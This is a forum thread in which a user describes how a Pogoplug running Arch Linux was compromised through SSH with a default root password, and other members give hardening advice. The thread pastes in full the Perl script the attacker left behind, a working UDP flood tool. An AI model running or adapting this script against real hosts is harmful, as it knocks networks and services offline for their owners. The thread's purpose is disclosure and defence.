[rev667]

On Friday I bought a 500Gb mobile hard drive, special offer at the local supermarket.

So over the weekend, I unplugged the old flash memory stick from my Pogo (E02), rebooted to stock, and basically followed Qui's tutorial.

Installed Arch on sda1 (8Gb) formatted the rest for data (sda2).

Installed samba, then the original pogoplug functions from moonmans instructions, all was good with the world.

Copied some files over from my linux mint PC, and to/from the wifes windows PC. Tested the mypogo website was working ok.

By Sunday evening I was contemplating installing a webserver, mysql, php stack... and then the internet connection failed. I have a Sky broadband setup, with a cute Sky wireless ADSL modem/router, the internet indicator was orange, telling me there was no internet.

Tried rebooting the router, still no connection. So left it alone suspecting a problem at the exchange, and went to bed.

This morning the router was healthy, and booting up my PC (into windows for a change) I was connected to the net. The wireless connection to the router wasn't active for some reason (my PC is wired not wireless), and I had to refresh it. But it was all working fine, updated my noip.me dynamic dns, and went to work.

At work I fired up putty and checked I could ssh into the pogo from outside the lan, that worked fine, but I noticed a file in the root home directory.

It was a perl? script, inside there was a reference to a Romanian website, and some printf commands which google translate suggested this was some kind of DDOS script. (I can copy/paste it here later)

So I phoned the wife, and got her to remove the power lead from the Pogo, just to be safe.

I suspect this script, or maybe something else was randomly sending packets and either the router fell over, or maybe the dslam at the exchange.

When I get home tonight, I'll copy/paste the script, and flatten sda1 before re-installing arch, and the first command I'll issue will be 'passwd'

I will also check the port forwarding on the router hasn't been changed, and run security scans on all my PC's and OS's

So this is a word of warning, CHANGE THE DEFAULT PASSWORD AS SOON AS POSSIBLE!

Still, it's all good fun

Rev.

[hydro]

https://wiki.archlinux.org/index.php/Ssh#Protecting_SSH

[rev667]

Cheers for that Hydro,

Plenty of brain-twisting reading there... mainly because they assume you know how to do certain things, for example :-

"Before effecting this setting, make sure that all accounts which require SSH access have public key authentication set up in the corresponding authorized_keys files."

I have no idea how to do this, therefore I have to read up on that topic, which will lead me onto another topic etc.etc.

I'll have to look at the logs out of curiosity.

Rev

[hydro]

That's explained on another Wiki site, but a safe password should do.
https://wiki.archlinux.org/index.php/SSH_keys

[grayman4hire]

@rev667,

Are you saying you opened up external ssh access (via port fordwarding on your router - port 22 also?) to your pogoplug without changing the default root password? If so, what happened would be expected.
Gray

[WarheadsSE]

yup, I forgot to change the default password, dumb, but live and learn.

Reading up now on stuff, change crappy router port forwarding rules, cant change the router cos Sky broadband uses a custon authentication protocol :/

Anyway, I'm home now, so an evening re-installing alarm and trying to remember to add a bit more security hehe.

For those interested in the odd file I found, it's pasted below

$this->bbcode_second_pass_code('', '#!/usr/bin/perl


use Socket;

$ARGC=@ARGV;

if ($ARGC !=3) {
printf "$0 <ip> <port> <time>\n";
printf "for any info vizit http: //hacking[dot]3xforum[period]ro/ \n";
exit(1);
}

my ($ip,$port,$size,$time);
$ip=$ARGV[0];
$port=$ARGV[1];
$time=$ARGV[2];

socket(crazy, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$ip");

printf "ovica Se Apuca De Floodat $ip Pe Portu $port \n";
printf "Daca Nu Lesina In 10 Minute Mai Incercam Odata Pana Pica \n";

if ($ARGV[1] ==0 && $ARGV[2] ==0) {
goto randpackets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto randpackets;
}

packets:
for (;;) {
$size=$rand x $rand x $rand;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

randpackets:
for (;;) {
$size=$rand x $rand x $rand;
$port=int(rand 65000) +1;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}
')

I have not visited the site, no intention of doing so.

Rev (dumb but still smiling)

[moonman]

Change the default internet facing port of ssh to something else too. I did see a lot of failed attempts to authenticate as root before i changed the port

[rev667]

New alarm installed, proper password, samba working. Next is the crappy sky router.

http://www.instructables.com/id/Sky-Hub-SR101-Modification-Fix/

As well as close all port forwarding until I figure out some better security, perhaps a double-knock ssh scheme

Now onto a LAMP stack, lighttp, mariadb, php I think.

Rev

[grayman4hire]

I don't think you need to get too fancy. Set a nice long password and open up ssh access on a non-standard port (and disable root ssh login). This should deal with 99.9% of the hacking attempts.

[WarheadsSE]

Or skip all password issues entirely, set reasonable passwords for the users, and use ssh-keys only by disabling ssh with password auth.